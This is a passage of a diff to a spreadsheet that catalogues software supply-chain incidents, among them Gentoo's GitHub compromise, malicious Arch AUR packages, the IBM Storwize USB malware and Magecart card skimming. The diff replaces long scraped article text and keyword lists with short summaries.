'currency', 'complain', 'application', 'good', 'text', 'error', 'prateekgoyal18', 'starvald', 'vadi2', 'thumb', 'emoji', 'thehlopster', 'reaction', 'reaction', 'reaction', 'link', 'mathe30', 'message', 'email', 'confused', 'emoji', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'mathe30', 'dirty', 'secrity', 'application', 'public', 'cheap', 'bitch', 'thumb', 'emoji', 'tim77', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'sparkiegeek', 'copy', 'link', 'contributor', 'thank', 'store', 'noromanba', 'mathe30', 'tdemin', 'sebt3', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'author', 'edited', 'sparkiegeek', 'note', 'application', 'author', 'miner', 'thank', 'sparkiegeek', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'contributor', 'application', 'author', 'investigation', 'reaction', 'reaction', 'sorry', 'wrong', 'sparkiegeek', 'copy', 'poor', 'sm4rk0', 'thgro', 'thumb', 'thumb', 'reaction', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'poor', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'plan', 'fake', 'package', 'update', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'future', 'reference', 'store', 'category', 'snapcraft', 'forum', 'good', 'place', 'store', 'removal', 'snappy', 'developer', 'forum', 'swifter', 'response', 'topic', 'action', 'future', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'post', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'author', 'version', 'victim', 'computer', 'version', 'snap', 'quarantine', 'snapquarantine', 'application', 'author', 'reaction', 'wrong', 'copy', 'link', 'ghost', 'image', 'manipulation', 'program', 'gimp', 'application', 'virus', 'ubuntu', 'store', 'careful', 'install', 'gimp', 'people', 'rating', 'ubuntu', 'store', 'people', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'ultrafractal', 'substantiate', 'claim', 'unlikely', 'gimp', 'httpsgithubcomsnapcrafter', 'miner', 'snapcrafter', 'snapcrafter', 'account', 'aware', 'canonical', 'employee', 'access', 'canonical', 'culpable', 'claim', 'correct', 'gimp', 'snapcrafter', 'crypto', 'miner', 'evidence', 'reaction', 'reaction', 'wrong', 'issue', 'supply', 'chain', 'attack', 'timbmachine', 'issue', 'intel', 'open', 'sign', 'free', 'conversation', 'sign', 'comment', 'sparkiegeek', 'label', 'none', 'none', 'milestone', 'development', 'branch', 'request', 'participant', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -2223,15 +1951,14 @@
           <t>Android Handsets</t>
         </is>
       </c>
-      <c r="C69" t="inlineStr"/>
+      <c r="C69" t="inlineStr">
+        <is>
+          <t>Criminal group still infecting Android firmware with Cosiloon: Malware Found in the Firmware of 141 Low-Cost Android Devices</t>
+        </is>
+      </c>
       <c r="D69" t="inlineStr">
         <is>
           <t>https://www.bleepingcomputer.com/news/security/malware-found-in-the-firmware-of-141-low-cost-android-devices</t>
-        </is>
-      </c>
-      <c r="E69" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -2246,15 +1973,14 @@
           <t>Docker Hub</t>
         </is>
       </c>
-      <c r="C70" t="inlineStr"/>
+      <c r="C70" t="inlineStr">
+        <is>
+          <t>17 backdoored images were placed on Docker Hub.</t>
+        </is>
+      </c>
       <c r="D70" t="inlineStr">
         <is>
           <t>https://www.bleepingcomputer.com/news/security/17-backdoored-docker-images-removed-from-docker-hub/</t>
-        </is>
-      </c>
-      <c r="E70" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -2271,17 +1997,12 @@
       </c>
       <c r="C71" t="inlineStr">
         <is>
-          <t>support results found search query tips return expected results reduce number search terms term focuses search check spelling single misspelled incorrectly typed term change result substituting synonyms original terms example instead searching java classes java training search acquired sold product follow appropriate link find content need apologies search results available time please later support options page storwize initialization tool contain malicious code flashes alerts abstract detected flash drives containing initialization tool shipped storwize v3500 v3700 v5000 systems contain file infected malicious code content affected products initialization tool flash drive partnumber 01ac585 shipped following system models infected file storwize v3500 models storwize v3700 models storwize v5000 models storwize v5000 models storwize systems serial numbers starting characters 78d2 affected neither storwize storage systems data stored systems infected malicious code systems listed flash drives used encryption management affected issue impact potential identified malicious file distributed flash drives used initialization tool storwize v3500 v3700 v5000 systems initialization tool launched flash drive tool copies temporary folder hard drive desktop laptop normal operation step malicious file copied initialization tool following temporary folder windows systems tmpinittool linux systems tmpinittool important malicious file copied onto desktop laptop file executed initialization affected initialization flash drive looks like images contains folder called inittool taken steps prevent additional flash drives shipped issue client actions used initialization flash drive products listed inserted desktop laptop initialize storwize system recommends verify antivirus software already removed infected file alternatively remove directory containing identified malicious file manner described recommends ensuring antivirus products updated configured scan temporary directories issues identified antivirus product addressed manually remove malicious file delete temporary directory windows systems tmpinittool linux systems tmpinittool addition windows systems ensure entire directory deleted moved recycle folder accomplished selecting directory shiftrightclickdelete directory initialization tool flash drives including used installation recommends taking following steps securely destroy flash drive reused repair flash drive reused delete folder called inittool flash drive delete folder files insideif using windows machine holding shift deleting folder ensure files permanently deleted rather copied recycle download initialization tool package fixcentral httpswwwibmcomsupportfixcentral unzip package onto flash drive manually scan flash drive antivirus software information malicious file hash 0178a69c43d4c57d401bf9596299ea57 malicious file detected following antivirus vendors engine signature version update ahnlabv3 win32pondre esetnod32 win32trojandropperagentpyf kaspersky trojanwin32reconychvow mcafee pwszbotfib0178a69c43d4 mcafeegwedition pwszbotfib0178a69c43d4 v2015 microsoft virtoolwin32injectoreg qihoo360 viruswin32wdexta symantec w32faedevourinf tencent trojanwin32dawsa trendmicro pewindexa trendmicrohousecall pewindexa zonealarm trojanwin32reconychvow questions contact support productcodestlm6blabelibm storwize v3500 2071business unitcodebu058labelibm infrastructure wtpscomponentplatformcodepf025labelplatform independentversionversion independenteditionline businesscodelob26labelstorageproductcodestlm6blabelibm storwize v3500 2071business unitcodebu058labelibm infrastructure wtpscomponent platformcodelabelversioneditionline businesscodelob26labelstorageproductcodestlm5alabelibm storwize v3700 2072business unitcodebu058labelibm infrastructure wtpscomponent platformcodelabelversioneditionline businesscodelob26labelstorageproductcodesthgujlabelibm storwize v5000business unitcodebu058labelibm infrastructure wtpscomponent platformcodelabelversioneditionline businesscodelob26labelstorage topic helpful useful useful document information modified date march ssg1s1010146 page feedback share feedback need support submit feedback support 1800ibm7378 directory worldwide contacts</t>
+          <t>IBM Storwize initialization tool ships with malicious code.</t>
         </is>
       </c>
       <c r="D71" t="inlineStr">
         <is>
           <t>https://www.ibm.com/support/pages/storwize-usb-initialization-tool-may-contain-malicious-code</t>
-        </is>
-      </c>
-      <c r="E71" t="inlineStr">
-        <is>
-          <t>['support', 'result', 'search', 'query', 'tip', 'return', 'result', 'number', 'search', 'term', 'term', 'search', 'check', 'spelling', 'single', 'misspelled', 'term', 'change', 'result', 'synonyms', 'original', 'term', 'example', 'class', 'training', 'search', 'product', 'appropriate', 'link', 'content', 'apology', 'search', 'result', 'available', 'time', 'support', 'option', 'page', 'storwize', 'initialization', 'tool', 'malicious', 'code', 'flash', 'alert', 'flash', 'drive', 'initialization', 'tool', 'system', 'file', 'malicious', 'code', 'content', 'product', 'initialization', 'tool', 'flash', 'drive', 'partnumber', 'system', 'model', 'file', 'storwize', 'model', 'v3700', 'model', 'v5000', 'model', 'v5000', 'model', 'system', 'serial', 'number', 'character', 'storwize', 'storage', 'system', 'datum', 'system', 'malicious', 'code', 'system', 'flash', 'drive', 'encryption', 'management', 'issue', 'impact', 'potential', 'malicious', 'file', 'flash', 'drive', 'initialization', 'tool', 'system', 'initialization', 'tool', 'flash', 'drive', 'tool', 'temporary', 'folder', 'hard', 'drive', 'desktop', 'laptop', 'normal', 'operation', 'step', 'malicious', 'file', 'initialization', 'tool', 'temporary', 'folder', 'important', 'malicious', 'file', 'desktop', 'laptop', 'file', 'initialization', 'initialization', 'flash', 'drive', 'image', 'folder', 'inittool', 'step', 'additional', 'flash', 'drive', 'issue', 'client', 'action', 'initialization', 'flash', 'drive', 'product', 'desktop', 'laptop', 'storwize', 'system', 'software', 'infected', 'file', 'directory', 'malicious', 'file', 'manner', 'antivirus', 'product', 'issue', 'antivirus', 'product', 'malicious', 'file', 'delete', 'temporary', 'directory', 'window', 'addition', 'window', 'system', 'entire', 'directory', 'recycle', 'folder', 'directory', 'shiftrightclickdelete', 'directory', 'initialization', 'tool', 'flash', 'drive', 'installation', 'step', 'flash', 'drive', 'repair', 'flash', 'drive', 'delete', 'folder', 'drive', 'delete', 'folder', 'file', 'insideif', 'window', 'machine', 'shift', 'folder', 'file', 'copied', 'recycle', 'download', 'initialization', 'tool', 'package', 'fixcentral', 'httpswwwibmcomsupportfixcentral', 'unzip', 'package', 'flash', 'drive', 'drive', 'software', 'information', 'malicious', 'file', 'hash', 'malicious', 'file', 'vendor', 'engine', 'signature', 'version', 'update', 'esetnod32', 'symantec', 'tencent', 'trendmicro', 'question', 'contact', 'support', 'unitcodebu058labelibm', 'infrastructure', 'wtpscomponentplatformcodepf025labelplatform', 'unitcodebu058labelibm', 'infrastructure', 'wtpscomponent', 'platformcodelabelversioneditionline', 'unitcodebu058labelibm', 'infrastructure', 'wtpscomponent', 'platformcodelabelversioneditionline', 'v5000business', 'unitcodebu058labelibm', 'infrastructure', 'wtpscomponent', 'platformcodelabelversioneditionline', 'businesscodelob26labelstorage', 'topic', 'helpful', 'useful', 'useful', 'document', 'information', 'date', 'page', 'feedback', 'share', 'feedback', 'support', 'feedback', 'support', 'directory', 'worldwide', 'contact']</t>
         </is>
       </c>
     </row>
@@ -2298,17 +2019,12 @@
       </c>
       <c r="C72" t="inlineStr">
         <is>
-          <t>jump content gentoo gentooorg sites gentooorg wiki bugs packages forums planet archives devmanual gitweb infra status wiki toggle navigation main page recent changes help contribute documentation gentoo handbook gentoo core system hardware software desktop server project community gentoo projects tools links related changes special pages printable version permanent link page information browse properties user english create account toggle navigation project page discussion view source history projectinfrastructureincident reports20180628 github gentoo wiki projectinfrastructure incident reports redirected projectinfrastructureincident reports20180628 github jump tonavigation jump tosearch contents incident metadata incident summary impact malicious content available root cause background gentoos github lessons went well went badly lucky items action items timeline appendix known malicious content incident metadata status resolved incident commander robbat2 incident backups mgorny antarus communications antarus dilfridge private incident page infra httpsinfrawikigentooorggithub20180628 incident summary unknown entity gained control admin account gentoo github organization removed access organization repositories gentoo developers proceeded make various changes content gentoo developers infrastructure escalated github support gentoo organization frozen github staff gentoo regained control gentoo github organization reverted commits defaced content impact approximately days github unavailable gentoo pull request master tested issues gentoo proxy maintainers project impacted many proxymaint contributors github submit past pull requests apparently disconnected original commits closed github cant users open pull requests entity attempted wipe user content adding various repositories however code unlikely executed users various technical guards place development related proxymaint continued normal commits made incident malicious content available initial clones repositories time intervals malicious content gentoo recommends recreating clone cloned period gentoogentoo gentoomusl gentoosystemd root cause attacker gained access password organization administrator evidence collected suggests password scheme disclosure site made easy guess passwords unrelated webpages background gentoos github main gentoo repositories kept gentoo hosted infrastructure gentoo mirrors github order contributors believe private keys account impacted risk gentoohosted infrastructure impacted incident lessons went well gentoo responded quickly reports problems github responded quickly function hide impacted organization gentoo quickly removed account access entry point located github provided audit logs helped incident went badly initial communications unclear lacking detail areas users verify tree sure clean copy clearer guidelines even users copies data malicious commits malicious commits would execute communications three avenues wwwgentooorg infrastatusgentooorg email lists later added wiki page page inconsistent updates github failed block access repositories resulting malicious commits externally accessible gentoo forcepush soon discovered credential revocation procedures incomplete backup copy gentoo github organization detail systemd repo mirrored gentoo stored directly github lucky items numerous gentoo developers personal contacts github industry contacts proved valuable throughout incident response attack loud removing developers caused everyone emailed given credential taken likely quieter attack would provided longer opportunity window method attackers pushed commits force pushing commits made downstream consumption conspicuous would blocked silently pulling content existing checkouts pull action items actionitem make frequent offline backup settings actionitem stream audit gentoo infra httpsdevelopergithubcomv3activityeventstypesorganizationevent well actionitem review requirements github done gentoo github organization currently requires join actionitem reduce number people github owner power httpswwwterraformiodocsprovidersgithubrteamrepositoryhtml consider complete automation terraform actuation service account actionitem proactive retiring inactive people infra inprogress bugs open retire inactive infra members actionitem receive email everybody added httpsdevelopergithubcomv3activityeventstypesorganizationevent hook development keep offgithub actionitem validate infra member retirement procedures separately undertaker procedures note access revocation hosts missed actionitem prod gentooinfra members start using local password managers pass gopass inprogress draft guidelines reviewed actionitem apply protection gentoo services generally users actionitem document incident plan communications done incident plan place actionitem sponsor potential hardware based gentoos devs nitrokey linux foundation done gentoo foundation partnered nitrokey equip gentoo developers keys actionitem publish clear password policy including recommendations password management inprogress draft guidelines reviewed actionitem mirror systemd musl repos gitgentooorg inprogress actionitem audit gentoo system logins verify unexpected activity actionitem audit logs compromised account item complete actionitem rotate credentials compromised account item complete timeline times compiled activity logs logs indicate various github accounts probed looking vulnerable accounts last known legimate commit gentoogentoo matches gitgentooorgrepogentoogit autopushed mirror commit 38281f4252f89e3ef9cbae54dfc1ad553d296979 last known legimate commit gentoomusl matches gitgentooorgprojmuslgit commit 60461ca1385809bacf6a114a7f1ecfe22f6da47f attacker tries password account attacker successfully gains administrative access attacker invites dummy account attacker creates dummy account administrative access last known legimate commit gentoogentoo matches gitgentooorgrepogentoogit autopushed mirror commit 73b724093b9c2a8756b8c35d3e09793342fa9ca9 appear github audit attacker starts removing valid users earliest email timestamp someone removed organization first person notices something going github organization attacker invites second malicious user attacker adds second malicious user admin privileges malicious commit gentoogentoo 73b72409fdd8da2e adds readmemd file racist text first report infra something going github organization malicious commit gentoogentoo fdd8da2e49464b73 adds skelebuild attacker changes billing email first time malicious commit 49464b73 first noticed attacker changes billing email second time first abuse report github support malicious commit gentoogentoo 49464b73afcdc03b adds every ebuild infras informal contact github multiple personal channels second abuse report github malicious commit gentoogentoo afcdc03b e6db0eb4 forcepush squash entire history afcdc03b ebuilds malicious commit gentoomusl 60461ca1 e6db0eb4 forcepush history gentoogentoo squashed commit approx github informal report starting look infras formal ticket github support malicious commit gentoosystemd bf0e0a4d 50e3544d payload slightly obfuscated home configure script malicious commit gentoosystemd 50e3544d c46d8bbf forcepush revert previous commit bf0e0a4d squashed commit 50e3544d github support responds gentoo github frozen gentoo emails github requesting activity logs github locks suspected entry point github disclose gentoo found audit compromised users account 20180629t143018z github responds assuring gentoo audit ongoing logs produced soon github provides limited access gentoo gentoo determines account entry point gentoo infra preemptively removes access account primary gentoo properties repos bugs email github formally responds audit logs recommendations gentoo reviews activity compromised account used services gentoo emails github requesting hidden gentoo affects repairs particular concern audit github responds saying rehidden wait confirmation unhiding concerned proper operation organization members gentoo responds github saying keeping hidden investigation preferable keeping operable potentially unreliable malicious github gentoo discuss various cleanup strategies email formal request gentoo github audit affected compromised account explicit consent compromised user gentoo infra restores billing email gentoo emails github request incident commander handoff robbat2 mgorny trade contact information gentoo infra forcepush gentoosystemd restore state c46d8bbfbf0e0a4d gentoo infra forcepush gentoogentoo restore state e6db0eb473b72409 push takes several minutes size gentoo infra forcepush gentoomusl restore state e6db0eb460461ca1 github unlocks compromised account resets password compromised account holder regains account access produces account gentoo another incident handoff mgorny robbat2 gentoo requests update remediation plan open requests github responds statement still working remediation plan gentoo emails github asking remediation github responds remediation internal discussion ensues regarding whether wait unlock weekend attacker probes compromised account stolen credential still functions attempt fails gentoo emails github asking clarification remediation actions logs gentoo thinks still required gentoo requests status update github github responds result investigation described remediation actions took side gentoo responds github asks organization made public gentoo conclude repairs github responds unlocks gentoo github organization making publicly visible appendix known malicious content following commits known introduced unknown entities present githubhosted repositories never present gentoohosted master repositories gentoogentoo master branch e6db0eb4 forcepush afcdc03b 49464b73 fdd8da2e gentoomusl master branch e6db0eb4 forcepush gentoosystemd c46d8bbf forcepush 50e3544d gentoo regained access github repositories forcedpushed malicious repos retrieved httpswikigentooorgindexphptitleprojectinfrastructureincidentreports20180628githuboldid1054341 page last edited march privacy policy gentoo wiki disclaimers 2001–2024 gentoo authors gentoo trademark gentoo foundation contents document unless otherwise expressly stated licensed ccbysa40 license gentoo name logo usage guidelines apply</t>
+          <t>An unknown entity gained control of an admin account for the Gentoo GitHub Organization and removed all access to the organization (and its repositories) from Gentoo developers. They then proceeded to make various changes to content.</t>
         </is>
       </c>
       <c r="D72" t="inlineStr">
         <is>
           <t>https://wiki.gentoo.org/wiki/Project:Infrastructure/Incident_Reports/2018-06-28_Github</t>
-        </is>
-      </c>
-      <c r="E72" t="inlineStr">
-        <is>
-          <t>['content', 'site', 'bug', 'forum', 'planet', 'archive', 'status', 'wiki', 'toggle', 'navigation', 'main', 'page', 'recent', 'change', 'documentation', 'gentoo', 'handbook', 'gentoo', 'core', 'system', 'hardware', 'software', 'desktop', 'server', 'project', 'community', 'gentoo', 'project', 'tool', 'link', 'change', 'special', 'page', 'printable', 'version', 'permanent', 'link', 'page', 'information', 'property', 'user', 'account', 'navigation', 'project', 'page', 'discussion', 'view', 'source', 'history', 'projectinfrastructureincident', 'projectinfrastructure', 'incident', 'report', 'projectinfrastructureincident', 'tonavigation', 'jump', 'tosearch', 'content', 'incident', 'summary', 'impact', 'malicious', 'content', 'available', 'root', 'background', 'gentoo', 'lesson', 'lucky', 'item', 'action', 'item', 'timeline', 'appendix', 'malicious', 'content', 'incident', 'metadata', 'status', 'incident', 'commander', 'incident', 'backup', 'communication', 'private', 'incident', 'page', 'incident', 'summary', 'unknown', 'entity', 'control', 'admin', 'access', 'organization', 'repository', 'gentoo', 'developer', 'various', 'change', 'content', 'gentoo', 'developer', 'infrastructure', 'gentoo', 'control', 'commit', 'content', 'impact', 'day', 'unavailable', 'gentoo', 'request', 'master', 'issue', 'gentoo', 'proxy', 'project', 'many', 'proxymaint', 'contributor', 'request', 'original', 'commit', 'user', 'request', 'entity', 'user', 'content', 'various', 'repository', 'code', 'user', 'various', 'technical', 'guard', 'development', 'proxymaint', 'normal', 'commit', 'incident', 'malicious', 'content', 'available', 'initial', 'clone', 'repository', 'time', 'malicious', 'content', 'gentoo', 'clone', 'period', 'attacker', 'access', 'password', 'organization', 'administrator', 'evidence', 'password', 'scheme', 'disclosure', 'site', 'easy', 'guess', 'password', 'unrelated', 'webpage', 'background', 'main', 'gentoo', 'repository', 'gentoo', 'infrastructure', 'gentoo', 'mirror', 'order', 'contributor', 'private', 'key', 'account', 'risk', 'infrastructure', 'incident', 'lesson', 'gentoo', 'report', 'problem', 'function', 'hide', 'organization', 'gentoo', 'account', 'access', 'entry', 'point', 'audit', 'log', 'incident', 'initial', 'communication', 'unclear', 'detail', 'area', 'user', 'tree', 'clean', 'clear', 'guideline', 'user', 'datum', 'malicious', 'malicious', 'commit', 'communication', 'avenue', 'infrastatusgentooorg', 'email', 'list', 'wiki', 'page', 'page', 'inconsistent', 'update', 'block', 'access', 'repository', 'malicious', 'commit', 'accessible', 'gentoo', 'credential', 'revocation', 'procedure', 'incomplete', 'backup', 'copy', 'lucky', 'item', 'numerous', 'gentoo', 'developer', 'personal', 'contact', 'industry', 'contact', 'valuable', 'incident', 'response', 'attack', 'developer', 'credential', 'quieter', 'attack', 'long', 'opportunity', 'window', 'method', 'attacker', 'force', 'commit', 'downstream', 'consumption', 'conspicuous', 'content', 'checkout', 'action', 'item', 'actionitem', 'frequent', 'offline', 'backup', 'setting', 'stream', 'audit', 'gentoo', 'infra', 'review', 'requirement', 'join', 'actionitem', 'number', 'people', 'complete', 'automation', 'terraform', 'actuation', 'service', 'account', 'inactive', 'people', 'inprogress', 'bug', 'open', 'inactive', 'infra', 'member', 'actionitem', 'email', 'httpsdevelopergithubcomv3activityeventstypesorganizationevent', 'hook', 'development', 'offgithub', 'actionitem', 'infra', 'member', 'retirement', 'procedure', 'procedure', 'access', 'revocation', 'host', 'actionitem', 'prod', 'member', 'local', 'password', 'manager', 'draft', 'guideline', 'actionitem', 'protection', 'service', 'document', 'incident', 'plan', 'communication', 'incident', 'plan', 'place', 'actionitem', 'sponsor', 'potential', 'hardware', 'gentoo', 'devs', 'foundation', 'nitrokey', 'gentoo', 'developer', 'key', 'clear', 'password', 'policy', 'recommendation', 'password', 'management', 'inprogress', 'draft', 'guideline', 'actionitem', 'mirror', 'systemd', 'audit', 'gentoo', 'system', 'login', 'unexpected', 'activity', 'actionitem', 'audit', 'log', 'account', 'item', 'complete', 'actionitem', 'rotate', 'credential', 'account', 'item', 'complete', 'timeline', 'activity', 'log', 'log', 'various', 'account', 'probed', 'vulnerable', 'account', 'legimate', 'match', 'mirror', 'last', 'legimate', 'password', 'account', 'attacker', 'administrative', 'access', 'attacker', 'dummy', 'account', 'attacker', 'dummy', 'account', 'administrative', 'access', 'last', 'legimate', 'match', 'mirror', 'attacker', 'valid', 'user', 'early', 'email', 'timestamp', 'organization', 'first', 'person', 'attacker', 'second', 'malicious', 'user', 'attacker', 'second', 'malicious', 'user', 'admin', 'privilege', 'malicious', 'commit', 'readmemd', 'file', 'racist', 'text', 'first', 'report', 'malicious', 'commit', 'gentoogentoo', 'skelebuild', 'attacker', 'billing', 'email', 'first', 'time', 'malicious', 'commit', 'attacker', 'billing', 'email', 'second', 'time', 'first', 'abuse', 'report', 'malicious', 'commit', 'ebuild', 'infra', 'informal', 'contact', 'multiple', 'personal', 'channel', 'second', 'abuse', 'report', 'malicious', 'entire', 'history', 'malicious', 'e6db0eb4', 'history', 'informal', 'report', 'formal', 'ticket', 'malicious', 'home', 'configure', 'script', 'malicious', 'c46d8bbf', 'previous', 'support', 'email', 'activity', 'log', 'entry', 'point', 'audit', 'user', '20180629t143018z', 'gentoo', 'audit', 'ongoing', 'log', 'limited', 'access', 'gentoo', 'gentoo', 'account', 'entry', 'point', 'gentoo', 'infra', 'access', 'account', 'primary', 'property', 'repos', 'bug', 'audit', 'log', 'recommendation', 'gentoo', 'review', 'activity', 'account', 'service', 'gentoo', 'email', 'repair', 'particular', 'concern', 'audit', 'confirmation', 'concerned', 'proper', 'operation', 'organization', 'member', 'gentoo', 'investigation', 'preferable', 'operable', 'unreliable', 'malicious', 'gentoo', 'various', 'cleanup', 'strategy', 'email', 'formal', 'request', 'account', 'explicit', 'consent', 'user', 'infra', 'billing', 'email', 'gentoo', 'email', 'commander', 'trade', 'contact', 'information', 'gentoo', 'state', 'infra', 'gentoogentoo', 'restore', 'state', 'push', 'several', 'minute', 'gentoo', 'account', 'reset', 'password', 'account', 'holder', 'account', 'access', 'gentoo', 'incident', 'handoff', 'gentoo', 'request', 'remediation', 'plan', 'open', 'request', 'statement', 'remediation', 'plan', 'gentoo', 'email', 'remediation', 'remediation', 'internal', 'discussion', 'unlock', 'weekend', 'attacker', 'probe', 'account', 'credential', 'function', 'attempt', 'gentoo', 'email', 'github', 'clarification', 'remediation', 'action', 'gentoo', 'request', 'status', 'result', 'investigation', 'remediation', 'action', 'side', 'gentoo', 'organization', 'public', 'gentoo', 'repair', 'unlock', 'visible', 'appendix', 'malicious', 'content', 'commit', 'unknown', 'entity', 'repository', 'master', 'repository', 'gentoo', 'access', 'repository', 'malicious', 'repos', 'page', 'privacy', 'policy', 'gentoo', 'wiki', 'disclaimer', 'gentoo', 'author', 'trademark', 'foundation', 'content', 'document', 'ccbysa40', 'license', 'gentoo', 'name', 'logo', 'usage', 'guideline']</t>
         </is>
       </c>
     </row>
@@ -2325,17 +2041,12 @@
       </c>
       <c r="C73" t="inlineStr">
         <is>
-          <t>news source content weekly edition archives search kernel events calendar unread comments write edition return briefs page user password subscribe account malware found arch linux repository posted july corbet heres report sensors tech forum discovery hostile packages arch linux repository system contains usercontributed packages course part arch distribution investigation shows shows malicious user nick name xeactor modified june orphaned package software without active maintainer called acroread changes included curl script downloads runs script remote site installs persistent software reconfigures systemd order start periodically appears serious infected hosts scripts manipulated time include arbitrary code packages modified manner thread aurgeneral list shows timeline discovery response post comments packages affected posted rengolin guest link case people looking list affected packages acrored balz minergate source httpslistsarchlinuxorgpipermailaurgeneral2018ju packages affected posted jak90 subscriber link seems acrored typo adobe reader package acroread thats sitting back package version even dares native version application longer supported officially available adobe likewise submitting mistyped packages would seem like viable compromise vector well packages affected posted guest link thats typosquatting attack talked years httpslwnnetarticles694830 case arch packages theres also idea targetting orphaned packages malware found arch linux repository posted xterminator subscriber link surprise publically accessible repository contains malware vetting involved creating account submitting packages caveat emptor always check getting copyright eklektix comments public postings copyrighted creators linux registered trademark linus torvalds</t>
+          <t>Malware has been discovered in at least three orphaned Arch Linux packages available on AUR (Arch User Repository) that were taken over by a malicious actor.</t>
         </is>
       </c>
       <c r="D73" t="inlineStr">
         <is>
           <t>https://lwn.net/Articles/759461/</t>
-        </is>
-      </c>
-      <c r="E73" t="inlineStr">
-        <is>
-          <t>['news', 'source', 'content', 'weekly', 'edition', 'archive', 'search', 'kernel', 'event', 'calendar', 'unread', 'comment', 'edition', 'return', 'brief', 'page', 'user', 'password', 'account', 'here', 'sensor', 'tech', 'forum', 'arch', 'system', 'usercontributed', 'package', 'part', 'arch', 'distribution', 'investigation', 'malicious', 'user', 'xeactor', 'package', 'software', 'active', 'maintainer', 'acroread', 'change', 'curl', 'script', 'download', 'script', 'remote', 'site', 'persistent', 'software', 'reconfigure', 'systemd', 'order', 'serious', 'host', 'script', 'time', 'arbitrary', 'code', 'package', 'manner', 'thread', 'aurgeneral', 'list', 'timeline', 'discovery', 'response', 'post', 'comment', 'package', 'rengolin', 'guest', 'link', 'case', 'people', 'list', 'package', 'httpslistsarchlinuxorgpipermailaurgeneral2018ju', 'package', 'link', 'acrored', 'typo', 'adobe', 'reader', 'package', 'version', 'native', 'version', 'application', 'available', 'adobe', 'mistyped', 'package', 'viable', 'compromise', 'vector', 'package', 'guest', 'link', 'typosquatting', 'attack', 'year', 'case', 'arch', 'package', 'idea', 'package', 'surprise', 'accessible', 'repository', 'vetting', 'account', 'package', 'caveat', 'emptor', 'public', 'posting', 'creator', 'linus']</t>
         </is>
       </c>
     </row>
@@ -2352,17 +2063,12 @@
       </c>
       <c r="C74" t="inlineStr">
         <is>
-          <t>trending apple vision review fascinating flawed needs things tried headsets heres people chatgpt chatgpt plus subscription worth hours train fundamentals free upgrade windows home edition useful things flipper zero apple watch year metas rayban smart glasses useful gadget tested year iphone review upgrade samsung galaxy ultra review best smartphones year sonos review close perfect smart speaker need antivirus linux best laptops best vpns best best headphones best robot vacuums zdnet recommends tech gaming headphones laptops mobile accessories networking printers smartphones smart watches speakers streaming devices streaming services tablets wearables kitchen household office furniture office hardware appliances smart home smart lighting yard outdoors innovation artificial intelligence cloud digital transformation energy robotics sustainability transportation work life accelerate tech game paid content space race drive innovation metaverse change future work society managing multicloud future internet rules work tech trends watch business business amazon apple developer ecommerce edge computing enterprise software executive google microsoft professional development social media windows digital transformation trends insights success software development emerging trends changing roles cyber threats password manager ransomware cybersecurity lets tactical securing cloud advice deals howto product comparisons product spotlights reviews buying guides buying guides best allinone computers best budget best gaming cpus best gaming laptops best gaming best headphones best ipads best iphones best laptops best large tablets best oled best robot vacuum mops best rugged tablets best samsung phones best smart rings best smartphones best smartwatches best speakers best tablets best travel vpns best best vpns best coupons tomorrow belongs embrace today asia australia europe india united kingdom united states zdnet france zdnet germany zdnet korea zdnet japan popular topics finance education health special features zdnet depth zdnet recommends newsletters videos editorial guidelines trending apple vision review fascinating flawed needs things tried headsets heres people chatgpt chatgpt plus subscription worth hours train fundamentals free upgrade windows home edition useful things flipper zero apple watch year metas rayban smart glasses useful gadget tested year iphone review upgrade samsung galaxy ultra review best smartphones year sonos review close perfect smart speaker need antivirus linux best laptops best vpns best best headphones best robot vacuums zdnet recommends tech gaming headphones laptops mobile accessories networking printers smartphones smart watches speakers streaming devices streaming services tablets wearables kitchen household office furniture office hardware appliances smart home smart lighting yard outdoors innovation artificial intelligence cloud digital transformation energy robotics sustainability transportation work life accelerate tech game paid content space race drive innovation metaverse change future work society managing multicloud future internet rules work tech trends watch business business amazon apple developer ecommerce edge computing enterprise software executive google microsoft professional development social media windows digital transformation trends insights success software development emerging trends changing roles cyber threats password manager ransomware cybersecurity lets tactical securing cloud advice deals howto product comparisons product spotlights reviews buying guides buying guides best allinone computers best budget best gaming cpus best gaming laptops best gaming best headphones best ipads best iphones best laptops best large tablets best oled best robot vacuum mops best rugged tablets best samsung phones best smart rings best smartphones best smartwatches best speakers best tablets best travel vpns best best vpns best coupons topics finance education health special features zdnet depth zdnet recommends newsletters videos editorial guidelines tech home tech ticketmaster breach part larger credit card skimming effort analysis shows breach wasnt oneoff event believed part massive credit card skimming operation written zack whittaker contributor july recent breach ticketmaster iceberg wider massive credit card skimming operation research found least ecommerce sites said affected included code developed thirdparty companies later altered hackers according firm riskiq credit card skimming effort massive campaign group dubbed magecart operational since least targets software companies build provide code developers include websites improve site customer experience hackers break alter code affects every website runs potentially affecting millions users every yonathan klijnsma researcher riskiq said magecart larger reach credit card breach date isnt stopping soon targeting thirdparty code supplier hackers cases nearly victims instantly said research cast mind back last week ticketmaster breach ticket selling giant admitted customers payment data compromised website running code inbenta customer support software company hackers altered uncommon websites rely thirdparty code hosted sites services support present single point failure breached affect every site code loaded inbenta said ticketmaster affected ticketmaster said sites compromised code riskiq says ticketmaster breach bigger first thought several global sites including site initially ruled affected running code another thirdparty company also compromised group according riskiq code hosted social analysis company sociaplus also breached hackers changed code quietly skim credit cards entered checkout site code served hackers obfuscated malicious code javascript library button form hooked user clicks button submits form fields page skimmer extracts name value fields combines sends drop server owned magecart actors said riskiq researchers spokesperson ticketmaster said prior publication hard comment without seeing report reiterated earlier comments denying claims report sociaplus respond request comment magecart also targeted thirdparty code companies ecommerce sites rely analytics website support content delivery using companys proprietary investigation platform company found four thirdparty code suppliers hacked magecart resulting compromised javascript scraping personal information user sites contained loaded code checked affected code 